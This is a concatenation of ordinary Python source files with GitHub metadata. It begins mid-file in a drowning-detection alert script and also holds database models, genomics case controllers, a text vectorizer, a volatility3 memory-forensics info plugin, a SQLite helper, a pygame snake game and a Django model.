pil_image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
pil_image = aug(image=np.array(pil_image))['image']
if self.fram == 500:
break
self.fram+=1
pil_image = np.transpose(pil_image, (2, 0, 1)).astype(np.float32)
pil_image = torch.tensor(pil_image, dtype=torch.float).cuda()
pil_image = pil_image.unsqueeze(0)
outputs = model(pil_image)
_, preds = torch.max(outputs.data, 1)
self.calculateDrowning(lb.classes_[preds])
print("Frame classified as: ",lb.classes_[preds])
else:
break
print("FPS: ", int(1 / (time.time() - start_time)))
#print(self.countDrowning)
return 0
def calculateDrowning(self, classClassified):
if classClassified == 'drowning':
self.countDrowning += 1
if self.countDrowning >= self.ThresholdForDrowning:
playsound('alarm.mp3')
self.alertDrowning()
self.countDrowning = 0
else:
self.countDrowning = 0
def alertDrowning(self):
organizationId = "25771623413315686"
sent = False
text = "drowning alert"
db = firestore.client()
collectionBane = db.collection("lifeguardnotifications").add({
"orgID": organizationId,
"sent": sent,
"text": text,
"sentTO":"lifeguard"
})
d = detection()
d.detectDrowning()
| Abdelazizmuhmd/drowning-detection | projectjetson/jetson.py | jetson.py | py | 3,581 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "firebase_admin.credentials.Certificate",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "firebase_admin.credentials",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "firebase_admin.initialize_app",
"line_number": 16,
"usage_type": "call"... |
12000905328 | # -*- coding: utf-8 -*-
"""Classes for lidar ratio related db tables"""
from ELDAmwl.database.tables.db_base import Base
from sqlalchemy import Column
from sqlalchemy import DECIMAL
from sqlalchemy import INTEGER
from sqlalchemy import text
class ExtBscOption(Base):
"""content of the db table ext_bsc_options
"""
__tablename__ = 'ext_bsc_options'
ID = Column(
INTEGER,
primary_key=True,
)
product_id = Column(
'_product_ID',
INTEGER,
nullable=False,
server_default=text("'-1'"),
)
extinction_options_product_id = Column(
'_extinction_options_product_ID',
INTEGER,
nullable=False,
index=True,
server_default=text("'-1'"),
)
raman_backscatter_options_product_id = Column(
'_raman_backscatter_options_product_ID',
INTEGER,
nullable=False,
index=True,
server_default=text("'-1'"),
)
error_method_id = Column(
'_error_method_ID',
INTEGER,
nullable=False,
index=True,
server_default=text("'-1'"),
)
min_BscRatio_for_LR = Column(
DECIMAL(10, 4),
nullable=False,
server_default=text("'1.0000'"),
)
| actris-scc/ELDAmwl | ELDAmwl/database/tables/lidar_ratio.py | lidar_ratio.py | py | 1,249 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "ELDAmwl.database.tables.db_base.Base",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.INTEGER",
"line_number": 19,
"usage_type": "argument"
},
{
"api... |
4851164907 | # -*- coding: utf-8 -*-
import itertools
from flask import url_for
from flask_mail import Message
import query_phenomizer
from scout.constants import (CASE_STATUSES, PHENOTYPE_GROUPS, COHORT_TAGS)
from scout.models.event import VERBS_MAP
from scout.server.utils import institute_and_case
STATUS_MAP = {'solved': 'bg-success', 'archived': 'bg-warning'}
SEX_MAP = {'1': 'male', '2': 'female'}
PHENOTYPE_MAP = {-9: 'missing', 0: 'missing', 1: 'unaffected', 2: 'affected'}
def cases(store, case_query):
"""Preprocess case objects."""
case_groups = {status: [] for status in CASE_STATUSES}
for case_obj in case_query:
analysis_types = set(ind['analysis_type'] for ind in case_obj['individuals'])
case_obj['analysis_types'] = list(analysis_types)
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
case_groups[case_obj['status']].append(case_obj)
data = {
'prio_cases': case_groups['prioritized'],
'cases': [(status, case_groups[status]) for status in CASE_STATUSES[1:]],
'found_cases': case_query.count(),
}
return data
def case(store, institute_obj, case_obj):
"""Preprocess a single case."""
for individual in case_obj['individuals']:
individual['sex_human'] = SEX_MAP.get(individual['sex'], 'unknown')
individual['phenotype_human'] = PHENOTYPE_MAP.get(individual['phenotype'])
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
suspects = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('suspects', [])]
causatives = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('causatives', [])]
distinct_genes = set()
case_obj['panel_names'] = []
for panel_info in case_obj.get('panels', []):
if panel_info.get('is_default'):
panel_obj = store.panel(panel_info['panel_id'])
distinct_genes.update([gene['hgnc_id'] for gene in panel_obj['genes']])
full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
case_obj['panel_names'].append(full_name)
case_obj['default_genes'] = list(distinct_genes)
for hpo_term in itertools.chain(case_obj.get('phenotype_groups', []),
case_obj.get('phenotype_terms', [])):
hpo_term['hpo_link'] = ("http://compbio.charite.de/hpoweb/showterm?id={}"
.format(hpo_term['phenotype_id']))
# other collaborators than the owner of the case
case_obj['o_collaborators'] = [collab_id for collab_id in
case_obj['collaborators'] if
collab_id != case_obj['owner']]
irrelevant_ids = ('cust000', institute_obj['_id'])
collab_ids = [collab['_id'] for collab in store.institutes() if
(collab['_id'] not in irrelevant_ids) and
(collab['_id'] not in case_obj['collaborators'])]
events = list(store.events(institute_obj, case=case_obj))
for event in events:
event['verb'] = VERBS_MAP[event['verb']]
data = {
'status_class': STATUS_MAP.get(case_obj['status']),
'other_causatives': store.check_causatives(case_obj),
'comments': store.events(institute_obj, case=case_obj, comments=True),
'hpo_groups': PHENOTYPE_GROUPS,
'events': events,
'suspects': suspects,
'causatives': causatives,
'collaborators': collab_ids,
'cohort_tags': COHORT_TAGS,
}
return data
def update_synopsis(store, institute_obj, case_obj, user_obj, new_synopsis):
"""Update synopsis."""
# create event only if synopsis was actually changed
if new_synopsis and case_obj['synopsis'] != new_synopsis:
link = url_for('cases.case', institute_id=institute_obj['_id'],
case_name=case_obj['display_name'])
store.update_synopsis(institute_obj, case_obj, user_obj, link,
content=new_synopsis)
def hpo_diseases(username, password, hpo_ids, p_value_treshold=1):
"""Return the list of HGNC symbols that match annotated HPO terms.
Args:
username (str): username to use for phenomizer connection
password (str): password to use for phenomizer connection
hpo_ids (list): HPO term ids to query with
p_value_treshold (float): keep only results with p_value at or below this
Returns:
query_result: a generator of dictionaries on the form
{
'p_value': float,
'disease_source': str,
'disease_nr': int,
'gene_symbols': list(str),
'description': str,
'raw_line': str
}
"""
# skip querying Phenomizer unless at least one HPO terms exists
try:
results = query_phenomizer.query(username, password, *hpo_ids)
diseases = [result for result in results
if result['p_value'] <= p_value_treshold]
return diseases
except SystemExit:
return None
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
"""Request a rerun by email."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
store.request_rerun(institute_obj, case_obj, user_obj, link)
# this should send a JSON document to the SuSy API in the future
html = """
<p>{institute}: {case} ({case_id})</p>
<p>Re-run requested by: {name}</p>
""".format(institute=institute_obj['display_name'],
case=case_obj['display_name'], case_id=case_obj['_id'],
name=user_obj['name'])  # .encode() here would render as b'...' under Python 3
# compose and send the email message
msg = Message(subject=("SCOUT: request RERUN for {}"
.format(case_obj['display_name'])),
html=html, sender=sender, recipients=[recipient],
# cc the sender of the email for confirmation
cc=[user_obj['email']])
mail.send(msg)
| gitter-badger/scout | scout/server/blueprints/cases/controllers.py | controllers.py | py | 6,194 | python | en | code | null | github-code | 1 | [
{
"api_name": "scout.constants.CASE_STATUSES",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "scout.constants.CASE_STATUSES",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "itertools.chain",
"line_number": 58,
"usage_type": "call"
},
{
"api_n... |
15362469033 | import click
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
def get_wiki_vocab(file):
"""
Build a vocabulary from Wikipedia articles.
Parameters
----------
file : str
File path to Wikipedia article text
Returns
-------
dict
Dictionary of words and their frequencies
"""
vocab = {}
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
if line[0:3]!='XXX':
line=line.strip('\n').split()
for token in line:
vocab[token.lower()] = vocab.get(token.lower(), 0) + 1
line=f.readline()
return vocab
def get_notes_vocab(file):
"""
Build a vocabulary from MIMIC notes text.
Parameters
----------
file : str
File path to combined_dataset from 1_preprocess_mimic.py
Returns
-------
dict
Dictionary of words and their frequencies
"""
vocab = {}
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
line = line.strip('\n').split()
if line[0] == 'codes:':
line = f.readline()
line = line.strip('\n').split()
if line[0] == 'notes:':
line = f.readline()
while line != 'end!\n':
line = line.strip('\n').split()
for token in line:
vocab[token.lower()] = vocab.get(token.lower(), 0) + 1
line = f.readline()
line = f.readline()
return vocab
def docs_to_strings(documents):
"""
Convert a list of lists of tokens to a list of strings.
Parameters
----------
documents : list
List of lists of tokens
Returns
-------
list
List of strings
"""
data = []
for doc in documents:
text = ''
for token in doc:
text += token + ' '
data.append(text)
return data
def get_wiki_documents(file, vocab):
"""
Get a list of lists of tokens from Wikipedia articles.
Parameters
----------
file : str
File path to Wikipedia article texts
vocab : dict
Dictionary of words and their frequencies
Returns
-------
list
List of lists of tokens
"""
documents = []
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
if line[0:4] == 'XXXd':
doc = []
line = f.readline()
while line[0:4] != 'XXXe':
line = line.strip('\n').split()
for token in line:
if token.lower() in vocab:
doc.append(token.lower())
line = f.readline()
documents.append(doc)
line = f.readline()
return documents
def get_notes(file, vocab):
"""
Get a list of lists of tokens from MIMIC notes.
Parameters
----------
file : str
File path to combined_dataset from 1_preprocess_mimic.py
vocab : dict
Dictionary of words and their frequencies
Returns
-------
list
List of lists of tokens
"""
documents = []
with open(file, 'r', encoding='utf-8') as f:
line = f.readline()
while line:
line = line.strip('\n').split()
if line[0] == 'codes:':
line = f.readline()
line = line.strip('\n').split()
if line[0] == 'notes:':
doc = []
line = f.readline()
while line != 'end!\n':
line = line.strip('\n').split()
for token in line:
if token.lower() in vocab:
doc.append(token)
line = f.readline()
documents.append(doc)
line = f.readline()
return documents
def vectorize(data, output_file, vectorizer):
"""
Apply a vectorizer to a list of strings.
Parameters
----------
data : list
List of strings
output_file : str
File path to save vectorized data
vectorizer : sklearn.feature_extraction.text.CountVectorizer or sklearn.feature_extraction.text.TfidfVectorizer
Vectorizer to apply
"""
embed = vectorizer.fit_transform(data)
embed = embed.A
embed = np.array(embed, dtype=float)
np.save(output_file, embed)
def process_data(file_wiki,
file_mimic,
output_wiki,
output_mimic,
vectorizer_type):
wiki_vocab = get_wiki_vocab(file_wiki)
note_vocab = get_notes_vocab(file_mimic)
vocab = set(note_vocab.keys()).intersection(set(wiki_vocab.keys()))
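    # keep only tokens shared by both corpora so the two embeddings align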
wiki_docs = get_wiki_documents(file_wiki, vocab)
notes = get_notes(file_mimic, vocab)
vocab_map = {}
for note in notes:
for token in note:
if token.lower() not in vocab_map.keys():
vocab_map[token.lower()] = len(vocab_map)
wiki_docs = docs_to_strings(wiki_docs)
notes = docs_to_strings(notes)
    if vectorizer_type == 'binary':
        vectorizer = CountVectorizer(min_df=1, vocabulary=vocab_map, binary=True)
    elif vectorizer_type == 'count':
        vectorizer = TfidfVectorizer(min_df=1, vocabulary=vocab_map, use_idf=False)
    elif vectorizer_type == 'tfidf':
        vectorizer = TfidfVectorizer(min_df=1, vocabulary=vocab_map)
    else:
        raise ValueError(f"Unknown vectorizer_type: {vectorizer_type}")
vectorize(wiki_docs, output_wiki, vectorizer)
vectorize(notes, output_mimic, vectorizer)
@click.command()
@click.option('--file_wiki', default='data/wikipedia_knowledge')
@click.option('--file_mimic', default='data/combined_dataset')
@click.option('--output_wiki', default='data/wikivec')
@click.option('--output_mimic', default='data/notevec')
@click.option('--vectorizer_type', default='binary', type=click.Choice(['binary', 'count', 'tfidf']))
def process_data_(file_wiki,
file_mimic,
output_wiki,
output_mimic,
vectorizer_type):
process_data(file_wiki,
file_mimic,
output_wiki,
output_mimic,
vectorizer_type)
if __name__ == "__main__":
process_data_()
| bllguo/KSI | vectorize_data.py | vectorize_data.py | py | 6,602 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.array",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "numpy.save",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "sklearn.feature_extraction.text.CountVectorizer",
"line_number": 204,
"usage_type": "call"
},
{
"api_nam... |
36170482691 | import time
from typing import List, Tuple, Iterable
from volatility3.framework import constants, interfaces, layers, symbols
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.renderers import TreeGrid
from volatility3.framework.symbols import intermed
from volatility3.framework.symbols.windows import extensions
class Info(plugins.PluginInterface):
"""Show OS & kernel details of the memory sample being analyzed."""
_required_framework_version = (2, 0, 0)
_version = (1, 0, 0)
@classmethod
def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:
return [
requirements.ModuleRequirement(
name="kernel",
description="Windows kernel",
architectures=["Intel32", "Intel64"],
),
]
@classmethod
def get_depends(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
index: int = 0,
) -> Iterable[Tuple[int, interfaces.layers.DataLayerInterface]]:
"""List the dependencies of a given layer.
Args:
context: The context to retrieve required layers from
layer_name: the name of the starting layer
index: the index/order of the layer
Returns:
An iterable containing the levels and layer objects for all dependent layers
"""
layer = context.layers[layer_name]
yield index, layer
try:
for depends in layer.dependencies:
for j, dep in cls.get_depends(context, depends, index + 1):
yield j, context.layers[dep.name]
except AttributeError:
# FileLayer won't have dependencies
pass
@classmethod
def get_kernel_module(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
symbol_table: str,
):
"""Returns the kernel module based on the layer and symbol_table"""
virtual_layer = context.layers[layer_name]
if not isinstance(virtual_layer, layers.intel.Intel):
raise TypeError("Virtual Layer is not an intel layer")
kvo = virtual_layer.config["kernel_virtual_offset"]
ntkrnlmp = context.module(symbol_table, layer_name=layer_name, offset=kvo)
return ntkrnlmp
@classmethod
def get_kdbg_structure(
cls,
context: interfaces.context.ContextInterface,
config_path: str,
layer_name: str,
symbol_table: str,
) -> interfaces.objects.ObjectInterface:
"""Returns the KDDEBUGGER_DATA64 structure for a kernel"""
ntkrnlmp = cls.get_kernel_module(context, layer_name, symbol_table)
native_types = context.symbol_space[symbol_table].natives
kdbg_offset = ntkrnlmp.get_symbol("KdDebuggerDataBlock").address
kdbg_table_name = intermed.IntermediateSymbolTable.create(
context,
interfaces.configuration.path_join(config_path, "kdbg"),
"windows",
"kdbg",
native_types=native_types,
class_types=extensions.kdbg.class_types,
)
kdbg = context.object(
kdbg_table_name + constants.BANG + "_KDDEBUGGER_DATA64",
offset=ntkrnlmp.offset + kdbg_offset,
layer_name=layer_name,
)
return kdbg
@classmethod
def get_kuser_structure(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
symbol_table: str,
) -> interfaces.objects.ObjectInterface:
"""Returns the _KUSER_SHARED_DATA structure for a kernel"""
virtual_layer = context.layers[layer_name]
if not isinstance(virtual_layer, layers.intel.Intel):
raise TypeError("Virtual Layer is not an intel layer")
ntkrnlmp = cls.get_kernel_module(context, layer_name, symbol_table)
# this is a hard-coded address in the Windows OS
if virtual_layer.bits_per_register == 32:
kuser_addr = 0xFFDF0000
else:
kuser_addr = 0xFFFFF78000000000
kuser = ntkrnlmp.object(
object_type="_KUSER_SHARED_DATA",
layer_name=layer_name,
offset=kuser_addr,
absolute=True,
)
return kuser
@classmethod
def get_version_structure(
cls,
context: interfaces.context.ContextInterface,
layer_name: str,
symbol_table: str,
) -> interfaces.objects.ObjectInterface:
"""Returns the KdVersionBlock information from a kernel"""
ntkrnlmp = cls.get_kernel_module(context, layer_name, symbol_table)
vers_offset = ntkrnlmp.get_symbol("KdVersionBlock").address
vers = ntkrnlmp.object(
object_type="_DBGKD_GET_VERSION64",
layer_name=layer_name,
offset=vers_offset,
)
return vers
@classmethod
def get_ntheader_structure(
cls,
context: interfaces.context.ContextInterface,
config_path: str,
layer_name: str,
) -> interfaces.objects.ObjectInterface:
"""Gets the ntheader structure for the kernel of the specified layer"""
virtual_layer = context.layers[layer_name]
if not isinstance(virtual_layer, layers.intel.Intel):
raise TypeError("Virtual Layer is not an intel layer")
kvo = virtual_layer.config["kernel_virtual_offset"]
pe_table_name = intermed.IntermediateSymbolTable.create(
context,
interfaces.configuration.path_join(config_path, "pe"),
"windows",
"pe",
class_types=extensions.pe.class_types,
)
dos_header = context.object(
pe_table_name + constants.BANG + "_IMAGE_DOS_HEADER",
offset=kvo,
layer_name=layer_name,
)
nt_header = dos_header.get_nt_header()
return nt_header
def _generator(self):
kernel = self.context.modules[self.config["kernel"]]
layer_name = kernel.layer_name
symbol_table = kernel.symbol_table_name
layer = self.context.layers[layer_name]
table = self.context.symbol_space[symbol_table]
kdbg = self.get_kdbg_structure(
self.context, self.config_path, layer_name, symbol_table
)
yield (0, ("Kernel Base", hex(layer.config["kernel_virtual_offset"])))
yield (0, ("DTB", hex(layer.config["page_map_offset"])))
yield (0, ("Symbols", table.config["isf_url"]))
yield (
0,
("Is64Bit", str(symbols.symbol_table_is_64bit(self.context, symbol_table))),
)
yield (
0,
("IsPAE", str(self.context.layers[layer_name].metadata.get("pae", False))),
)
for i, layer in self.get_depends(self.context, layer_name):
yield (0, (layer.name, f"{i} {layer.__class__.__name__}"))
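        # 0x4742444B is the little-endian ASCII tag b"KDBG", validating the block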
if kdbg.Header.OwnerTag == 0x4742444B:
yield (0, ("KdDebuggerDataBlock", hex(kdbg.vol.offset)))
yield (0, ("NTBuildLab", kdbg.get_build_lab()))
yield (0, ("CSDVersion", str(kdbg.get_csdversion())))
vers = self.get_version_structure(self.context, layer_name, symbol_table)
yield (0, ("KdVersionBlock", hex(vers.vol.offset)))
yield (0, ("Major/Minor", f"{vers.MajorVersion}.{vers.MinorVersion}"))
yield (0, ("MachineType", str(vers.MachineType)))
ntkrnlmp = self.get_kernel_module(self.context, layer_name, symbol_table)
cpu_count_offset = ntkrnlmp.get_symbol("KeNumberProcessors").address
cpu_count = ntkrnlmp.object(
object_type="unsigned int", layer_name=layer_name, offset=cpu_count_offset
)
yield (0, ("KeNumberProcessors", str(cpu_count)))
kuser = self.get_kuser_structure(self.context, layer_name, symbol_table)
yield (0, ("SystemTime", str(kuser.SystemTime.get_time())))
yield (
0,
(
"NtSystemRoot",
str(
kuser.NtSystemRoot.cast(
"string", encoding="utf-16", errors="replace", max_length=260
)
),
),
)
yield (0, ("NtProductType", str(kuser.NtProductType.description)))
yield (0, ("NtMajorVersion", str(kuser.NtMajorVersion)))
yield (0, ("NtMinorVersion", str(kuser.NtMinorVersion)))
# yield (0, ("KdDebuggerEnabled", "True" if kuser.KdDebuggerEnabled else "False"))
# yield (0, ("SafeBootMode", "True" if kuser.SafeBootMode else "False"))
nt_header = self.get_ntheader_structure(
self.context, self.config_path, layer_name
)
yield (
0,
(
"PE MajorOperatingSystemVersion",
str(nt_header.OptionalHeader.MajorOperatingSystemVersion),
),
)
yield (
0,
(
"PE MinorOperatingSystemVersion",
str(nt_header.OptionalHeader.MinorOperatingSystemVersion),
),
)
yield (0, ("PE Machine", str(nt_header.FileHeader.Machine)))
yield (
0,
(
"PE TimeDateStamp",
time.asctime(time.gmtime(nt_header.FileHeader.TimeDateStamp)),
),
)
def run(self):
return TreeGrid([("Variable", str), ("Value", str)], self._generator())
| volatilityfoundation/volatility3 | volatility3/framework/plugins/windows/info.py | info.py | py | 9,625 | python | en | code | 1,879 | github-code | 1 | [
{
"api_name": "volatility3.framework.interfaces.plugins.PluginInterface",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "volatility3.framework.interfaces.plugins",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "volatility3.framework.configuration.requir... |
87462737 | # https://skyeong.net/186
import numpy as np
from sklearn.datasets import fetch_openml
mnist = fetch_openml("MNIST_784")
X = mnist.data / 255.0
y = mnist.target
print (X.shape, y.shape)
import pandas as pd
feat_cols = ['pixel'+str(i) for i in range(X.shape[1]) ]
df = pd.DataFrame(X,columns=feat_cols)
df['label'] = y
df['label'] = df['label'].apply(lambda i: str(i))
X, y = None, None
print( 'Size of the dataframe: {}'.format(df.shape) )
rndperm = np.random.permutation(df.shape[0])
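# shuffle row indices so a random sample of digits gets plotted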
import matplotlib.pyplot as plt
# Plot the graph
plt.gray()
fig = plt.figure( figsize=(16,7) )
for i in range(0,30):
ax = fig.add_subplot(3,10,i+1,title='Digit: ' + str(df.loc[rndperm[i], 'label']) )
ax.matshow(df.loc[rndperm[i], feat_cols].values.reshape((28,28)).astype(float))
plt.show()
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
pca_result = pca.fit_transform(df[feat_cols].values)
df['pca-one'] = pca_result[:,0]
df['pca-two'] = pca_result[:,1]
df['pca-three'] = pca_result[:,2]
print( 'Explained variation per principal component: {}'.format(pca.explained_variance_ratio_))
{
"api_name": "sklearn.datasets.fetch_openml",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.random.permutation",
"line_number": 26,
"usage_type": "call"
},
{
"api_name":... |
# THEORY:
'''
# import pygame
import pygame
# initialize the pygame module
pygame.init()
# set the window size for Pygame
dis_width = 600 # width
dis_height = 400 # height
dis = pygame.display.set_mode((dis_width,dis_height))
red = (219, 31, 31)
green = (44, 219, 31)
squareSize = 20
circleRadius = 10
positionX = 200
positionY = 100
# set a title that will appear on the window
pygame.display.set_caption('First game')
# function that will serve as the game loop being developed
def gameLoop():
gameOver = False
while not gameOver:
pygame.display.update()
        # capture the keys that were pressed
        for event in pygame.event.get():
            # check whether the event is a quit event
            if event.type == pygame.QUIT:
                # flag the game as over so we exit the loop
                gameOver = True
        # draw a rectangle
        pygame.draw.rect(dis,red,[positionX,positionY,squareSize,squareSize])
        # draw a circle
        pygame.draw.circle(dis,green,(positionX+200,positionY),circleRadius)
    # quitting the game
pygame.quit()
# # main loop that would run the game
# while True:
# continue
# call the function to run our gameLoop
gameLoop()
'''
# Snake
import pygame
import random
pygame.init()
pygame.display.init()
pygame.font.init()
azul = (50, 100, 213)
laranja = (205, 102, 0)
verde = (0, 255, 0)
amarelo = (255,255,102)
dimensoes = (600, 600)
### INITIAL VALUES ###
x = 300
y = 300
d = 20
lista_cobra = [[x, y]]
dx = 0
dy = 0
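# spawn food snapped to the 20-pixel grid (coordinates are multiples of d)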
x_comida = round(random.randrange(0, 600 - d) / 20) * 20
y_comida = round(random.randrange(0, 600 - d) / 20) * 20
# fonte = pygame.font.Font(None,35)
tela = pygame.display.set_mode((dimensoes))
pygame.display.set_caption('Snake da Kenzie')
tela.fill(azul)
clock = pygame.time.Clock()
def desenha_cobra(lista_cobra):
tela.fill(azul)
for unidade in lista_cobra:
pygame.draw.rect(tela, laranja, [unidade[0], unidade[1], d, d])
def mover_cobra(dx, dy, lista_cobra):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
dx = -d
dy = 0
elif event.key == pygame.K_RIGHT:
dx = d
dy = 0
elif event.key == pygame.K_UP:
dx = 0
dy = -d
elif event.key == pygame.K_DOWN:
dx = 0
dy = d
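    # advance the snake: append the new head cell and drop the tail cell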
x_novo = lista_cobra[-1][0] + dx
y_novo = lista_cobra[-1][1] + dy
lista_cobra.append([x_novo, y_novo])
del lista_cobra[0]
return dx, dy, lista_cobra
def verifica_comida(dx, dy, x_comida, y_comida, lista_cobra):
head = lista_cobra[-1]
x_novo = head[0] + dx
y_novo = head[1] + dy
if head[0] == x_comida and head[1] == y_comida:
lista_cobra.append([x_novo, y_novo])
x_comida = round(random.randrange(0, 600 - d) / 20) * 20
y_comida = round(random.randrange(0, 600 - d) / 20) * 20
pygame.draw.rect(tela, verde, [x_comida, y_comida, d, d])
return x_comida, y_comida, lista_cobra
def verifica_parede(lista_cobra):
head = lista_cobra[-1]
x = head[0]
y = head[1]
if x not in range(600) or y not in range(600):
raise Exception
def verifica_mordeu(lista_cobra):
head = lista_cobra[-1]
corpo = lista_cobra.copy()
del corpo[-1]
for x,y in corpo:
if x == head[0] and y == head[1]:
raise Exception
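# NOTE: atualizar_pontos needs the commented-out `fonte = pygame.font.Font(None,35)`
# line above to be enabled before the call below is uncommented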
def atualizar_pontos(lista_cobra):
    pts = str(len(lista_cobra)-1)
    escore = fonte.render("Score: " + pts, True, amarelo)
    tela.blit(escore,[1,1])
while True:
pygame.display.update()
desenha_cobra(lista_cobra)
dx, dy, lista_cobra = mover_cobra(dx, dy, lista_cobra)
x_comida, y_comida, lista_cobra = verifica_comida(
dx, dy, x_comida, y_comida, lista_cobra)
print(lista_cobra)
verifica_parede(lista_cobra)
verifica_mordeu(lista_cobra)
# atualizar_pontos(lista_cobra)
clock.tick(12)
'''
# THEORY
import pygame
red = (219,31,31)
black = (0,0,0)
squareSize = 20
# will be used to determine how many frames per second
clock = pygame.time.Clock()
# speed at which our drawing will move
speed = 10
disWidth = 600
disHeight = 400
dis = pygame.display.set_mode((disWidth,disHeight))
pygame.display.set_caption('My game')
scoreFont = pygame.font.SysFont('/usr/share/fonts/truetype/freefont/FreeSans.ttf',35)
player = pygame.image.load('/home/fdmedina/Imagens/Crop Captura de tela de 2021-04-23 20-32-17.png')
playerRect = player.get_rect()
charSpeed = [speed,speed]
def verifyGameBounds(positionX,positionY):
if positionY > (disHeight - squareSize):
positionY = disHeight - squareSize
if positionY < 0:
positionY = 0
if positionX > (disWidth - squareSize):
positionX = disWidth - squareSize
if positionX < 0:
positionX = 0
return (positionX,positionY)
def gameLoop():
gameOver = False
    # initial position
positionX = disWidth / 2
positionY = disHeight / 2
    # # we'll use these to control movement
x1Change = 0
y1Change = 0
score = 100
while not gameOver:
displayScore(score)
pygame.display.update()
        # # we'll use these to control movement
# x1Change = 0
# y1Change = 0
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOver = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT or event.key == pygame.K_a:
x1Change = -speed
y1Change = 0
elif event.key == pygame.K_RIGHT or event.key == pygame.K_d:
x1Change = speed
y1Change = 0
elif event.key == pygame.K_UP or event.key == pygame.K_w:
x1Change = 0
y1Change = -speed
elif event.key == pygame.K_DOWN or event.key == pygame.K_s:
x1Change = 0
y1Change = speed
if event.type == pygame.KEYUP:
if event.key == pygame.K_UP or event.key == pygame.K_DOWN or event.key == pygame.K_w or event.key == pygame.K_s:
y1Change = 0
if event.key == pygame.K_RIGHT or event.key == pygame.K_LEFT or event.key == pygame.K_d or event.key == pygame.K_a:
x1Change = 0
dis.fill(black)
pygame.draw.rect(dis, red, [positionX,positionY,squareSize,squareSize])
positionX += x1Change
positionY += y1Change
positionX,positionY = verifyGameBounds(positionX,positionY)
        # using speed to change the rectangle's position
# positionY += speed
pygame.display.update()
        # capping at a maximum of 10 frames per second
clock.tick(speed)
pygame.quit()
def displayScore(score):
msgScore = scoreFont.render('Your score: ' + str(score),True,yellow)
dis.blit(msgScore,[0,0])
# call the function to run our gameLoop
gameLoop()
''' | fabiodm7/stuPy | intro/game.py | game.py | py | 7,319 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "pygame.display.init",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 61,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.init"... |
24657287989 | from django.db import models
# Create your models here.
class Category(models.Model):
name = models.CharField(max_length=200)
class Product(models.Model):
title = models.CharField(max_length=300)
description = models.TextField()
price = models.DecimalField(decimal_places=2, max_digits=10)
image = models.TextField(blank=True, null=True)
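    # NOTE: a ForeignKey to Category would be more idiomatic than a raw integer id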
category = models.IntegerField()
ratings = models.DecimalField(max_digits=10, decimal_places=2)
count = models.IntegerField()
| AbhishekBose89/Asssignment35-Q1-AbhishekBose | shoplane/restapi/models.py | models.py | py | 500 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "... |
28986490606 | import sqlite3
class SQLiteProfileImage():
def __init__(self):
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
dbname = "/sqlite/profile_image.db"
self.conn = sqlite3.connect(dbname)
self.conn.row_factory = dict_factory
cur = self.conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS USER_PROFILE_IMAGES(
E_MAIL STRING,
profile_image_url STRING NOT NULL,
PRIMARY KEY(E_MAIL)
)
""")
def end(self):
self.conn.close()
def replace(self, e_mail, profile_image_url):
cur = self.conn.cursor()
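        # parameterized placeholders avoid SQL injection through the inputs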
        sql = 'replace into USER_PROFILE_IMAGES values(?, ?)'
        try:
            cur.execute(sql, (e_mail, profile_image_url))
self.conn.commit()
except:
self.conn.close()
return False
self.conn.close()
return True
def fetch(self, e_mail):
cur = self.conn.cursor()
        cur.execute('SELECT * FROM USER_PROFILE_IMAGES WHERE e_mail=?', (e_mail,))
        try:
            result = cur.fetchall()[0]
        except IndexError:
            return None
self.conn.close()
return result
| minegishirei/flamevalue | trashbox/django3/app/flamevalue/my_SQLite_Profile.py | my_SQLite_Profile.py | py | 1,326 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sqlite3.connect",
"line_number": 12,
"usage_type": "call"
}
] |
72933516193 | # *_* coding : UTF-8 *_*
# author : Leemamas
